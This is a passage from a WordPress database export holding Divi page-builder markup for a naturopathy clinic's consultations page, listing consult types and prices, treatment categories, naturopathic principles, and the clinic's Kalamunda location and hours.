diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" hover_enabled=\"0\" border_width_all=\"1px\" sticky_enabled=\"0\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/3-01.png\" _builder_version=\"4.9.4\" _module_preset=\"default\" title_text=\"3-01\" align=\"center\" custom_padding=\"30px||30px||false|false\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][et_pb_blurb title=\"Return consult (50 min) - $80\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\" title_text=\"1-01 crop\" module_alignment=\"center\" use_icon=\"on\"]<p><span style=\"font-family: Montserrat; font-weight: normal;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on. </span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb image_last_edited=\"off|tablet\" _builder_version=\"4.9.4\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_blurb][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/2-01.png\" _builder_version=\"4.9.4\" _module_preset=\"default\" title_text=\"2-01\" align=\"center\" custom_padding=\"30px||30px||false|false\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $40\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\" title_text=\"1-01 crop\" module_alignment=\"center\" use_icon=\"on\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies or emotional health issues. Not suitable for long-term or chronic health issues.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_5,1_5,1_5,1_5,1_5\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" hover_enabled=\"0\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\" sticky_enabled=\"0\"][et_pb_column type=\"1_5\" _builder_version=\"4.9.4\" _module_preset=\"default\"][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\" title_text=\"3-01\"]<ul>\n<li><span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span></li>\n<li>Capsules/tablets<span style=\"font-family: Montserrat;\"></span></li>\n<li>Teas</li>\n<li>Topical creams</li>\n</ul>\n<p> </p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\" title_text=\"4-01\"]<ul>\n<li><span style=\"font-family: Montserrat;\">Food as medicine</span></li>\n<li><span style=\"font-family: Montserrat;\">Nutritional compounds</span></li>\n<li><span style=\"font-family: Montserrat;\">Supplements</span></li>\n</ul>\n<p> </p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\" title_text=\"5-01\"]<ul>\n<li><span style=\"font-family: Montserrat;\">Stress strategies</span></li>\n<li><span style=\"font-family: Montserrat;\">Exercise and movement</span></li>\n<li><span style=\"font-family: Montserrat;\">Mindfulness </span></li>\n<li><span style=\"font-family: Montserrat;\">Sleep support</span></li>\n</ul>\n<p> </p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/2-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\" title_text=\"2-01\"]<ul>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">Flower essences </span></li>\n</ul>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic approach to your health</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; font-weight: normal;\">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by the six naturopathic principles, utilising these to help us form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat; font-weight: normal;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat; font-weight: normal;\">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" hover_enabled=\"0\" sticky_enabled=\"0\" background_enable_image=\"off\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/1-01-crop.png\" title_text=\"1-01 crop\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"#ccd4c8\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_width_left=\"5px\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\">Location</span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\">Tues/Wed/Thurs: 9am - 5pm</span><br /><span style=\"font-family: Montserrat; font-weight: normal;\">Alternate Saturdays: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-05-25 11:07:32','2021-05-25 03:07:32','',28,'https://verde.desidrivers.com.au/?p=128',0,'revision','',0),(124,1,'2021-05-25 11:01:13','2021-05-25 03:01:13','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||180px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#000000\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat,Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%93}\"]<h1><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"> Consultations</span></h1>\n<p><span style=\"font-family: Montserrat;\">Choose from face-to-face and online Zoom consults.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Services\" _builder_version=\"4.9.4\"][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.9.4\" background_color=\"rgba(0,0,0,0)\" custom_padding=\"0px|||||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\"][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\"][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\"][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.4.8\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" hover_enabled=\"0\" custom_padding=\"7px|||||\" sticky_enabled=\"0\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-120px||||false|false\" custom_padding=\"0px||0px||true|false\" hover_enabled=\"0\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\" sticky_enabled=\"0\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/1-01.png\" _builder_version=\"4.9.4\" _module_preset=\"default\" title_text=\"1-01\" align=\"center\" background_color=\"#ccd4c8\" hover_enabled=\"0\" sticky_enabled=\"0\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (90 min) - $120\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\" title_text=\"1-01 crop\" module_alignment=\"center\" use_icon=\"on\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" hover_enabled=\"0\" border_width_all=\"1px\" sticky_enabled=\"0\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/3-01.png\" _builder_version=\"4.9.4\" _module_preset=\"default\" title_text=\"3-01\" align=\"center\" custom_padding=\"30px||30px||false|false\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][et_pb_blurb title=\"Return consult (50 min) - $80\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\" title_text=\"1-01 crop\" module_alignment=\"center\" use_icon=\"on\"]<p><span style=\"font-family: Montserrat; font-weight: normal;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on. </span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb image_last_edited=\"off|tablet\" _builder_version=\"4.9.4\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_blurb][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/2-01.png\" _builder_version=\"4.9.4\" _module_preset=\"default\" title_text=\"2-01\" align=\"center\" custom_padding=\"30px||30px||false|false\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $40\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" 